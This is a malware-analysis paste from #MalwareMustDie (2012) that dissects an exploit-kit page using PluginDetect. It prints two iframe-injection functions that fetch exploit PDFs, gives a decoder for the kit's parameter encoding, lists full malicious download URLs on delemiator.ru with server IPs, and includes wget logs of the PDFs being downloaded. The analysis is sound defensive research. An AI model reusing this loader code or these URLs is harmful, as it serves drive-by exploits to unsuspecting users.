#MalwareMustDie FLUSH2 - PluginDetect 0.7.9. Nov 25, 2012

1. // There are 2(two) functions of PDF downloader, p1() & p2()
2. // let's fetch the mess...
3.  
4.  function p1()
5.  {
6.    var d=document.createElement("div");
7.    d.innerHTML = "<iframe src=\"/forum/links/column.php?loh="+x("c833f")+"&gggijbpx="+x("occ")+"&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu="+x(pdfver.join("."))+"\"></iframe>";
8.    document.body.appendChild(d);
9.  }
10.  function p2()
11.  {
12.    var d=document.createElement("div");
13.    d.innerHTML = "<iframe src=\"/forum/links/column.php?olnvlwxj="+x("c833f")+"&xdhhdvud="+x("c")+"&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu="+x(pdfver.join("."))+"\"></iframe>";
14.    document.body.appendChild(d);
15.  }
16.  
17. // we have 2 IFRAME ↑here linked to formation url with the function x in PluginDetect,
18. //let's feed the logic above into "c833f", "occ", "c" to get the desired values,
19. // in this case like "30:1n:1i:1i:33", "3c:30:30" and "30"
20. // PS: in the end it asked the PDF version, use your desirable vaues i.e the above
21. // pdfver=[5,0,1,0] will be burped into string "5.0.1.0", put this into x to be burped as 1k:1d:1f:1d:1g:1d:1f
22. //
23. //Note, my memo code:
24.  
25. a=x("occ");  // rephrase this val with "c833f" or "5.0.1.0"
26.  function x(s)
27.  { d=[];
28.    for(i=0;i<s.length;i++)
29.    {      k=(s.charCodeAt(i)).toString(33);
30.          d.push(k);  };
31.    return d.join(":"); } eval(a);
32.  
33.  
34. // shortly, let's rephrase the url into all cracked strings, to get the download url below:
35.  
36. http://delemiator.ru:8080/forum/links/column.php?loh=30:1n:1i:1i:33&gggijbpx=3c:30:30&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu=1k:1d:1f:1d:1g:1d:1f
37. http://delemiator.ru:8080/forum/links/column.php?olnvlwxj=30:1n:1i:1i:33&xdhhdvud=30&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu=1k:1d:1f:1d:1g:1d:1f
38.  
39.  
40. // the PoC of this theory is as per downloaded exploit-downloader PDF below:
41.  
42. --17:14:11--  http://delemiator.ru:8080/forum/links/column.php?loh=30:1n:1i:1i:33&gggijbpx=3c:30:30&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu=1k:1d:1f:1d:1g:1d:1f
43.            => `column.php@loh=30%3A1n%3A1i%3A1i%3A33&gggijbpx=3c%3A30%3A30&xtppbw=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jbu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f'
44. Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
45. Connecting to delemiator.ru|202.180.221.186|:8080... connected.
46. HTTP request sent, awaiting response... 200 OK
47. Length: 27,836 (27K) [application/pdf]
48. 17:14:16 (16.21 KB/s) - `column.php@loh=30%3A1n%3A1i%3A1i%3A33&gggijbpx=3c%3A30%3A30&xtppbw=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jbu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f' saved [27836/27836]
49.  
50. --17:16:32--  http://delemiator.ru:8080/forum/links/column.php?olnvlwxj=30:1n:1i:1i:33&xdhhdvud=30&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu=1k:1d:1f:1d:1g:1d:1f
51.            => `column.php@olnvlwxj=30%3A1n%3A1i%3A1i%3A33&xdhhdvud=30&hgzmul=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&ohu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f'
52. Resolving delemiator.ru... 203.80.16.81, 208.87.243.131, 202.180.221.186
53. Connecting to delemiator.ru|203.80.16.81|:8080... connected.
54. HTTP request sent, awaiting response... 200 OK
55. Length: 14,769 (14K) [application/pdf]
56. 17:16:35 (66.79 KB/s) - `column.php@olnvlwxj=30%3A1n%3A1i%3A1i%3A33&xdhhdvud=30&hgzmul=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&ohu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f' saved [14769/14769]